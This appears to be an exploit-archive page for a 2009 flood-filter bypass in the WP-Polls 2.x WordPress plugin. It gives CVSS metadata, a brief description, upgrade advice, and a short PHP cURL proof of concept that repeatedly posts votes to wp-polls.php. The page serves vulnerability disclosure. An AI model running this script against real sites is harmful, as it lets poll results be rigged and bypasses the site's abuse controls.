header-logo
Suggest Exploit
vendor:
WP-Polls
by:
Jbyte
4.3
CVSS
MEDIUM
Incorrect Flood Filter
20
CWE
Product Name: WP-Polls
Affected Version From: 2.x
Affected Version To: 2.x
Patch Exists: YES
Related CWE: N/A
CPE: a:lesterchan:wp-polls
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7, Windows XP, Ubuntu 9.04, Ubuntu 9.10
2009

WP-Polls 2.x Incorrect Flood Filter

WP-Polls 2.x is vulnerable to incorrect flood filter. An attacker can send a crafted request to the wp-polls.php file with the poll_id and poll_7 parameters set to the ID of the survey and the ID of the vote respectively. This will allow the attacker to vote multiple times in the same survey.

Mitigation:

Upgrade to the latest version of WP-Polls.
Source

Exploit-DB raw data:

# Exploit Title: WP-Polls 2.x Incorrect Flood Filter
# Date: 30/11/2009
# Author: Jbyte (jbyte-security.blogspot.com)
# Software Link: http://lesterchan.net/wordpress/readme/wp-polls.html
# Version: 2.x
# Tested on: Windows 7/windows xp/ ubuntu 9.04/ ubuntu 9.10
# Code :

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://server/wp-content/plugins/wp-polls/wp-polls.php");
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,"vote=true&poll_id=ID survey here&poll_7=ID to vote here");
curl_exec($ch);

curl_close($ch);
?>

Navigation

Suggest Exploit

Services By CQR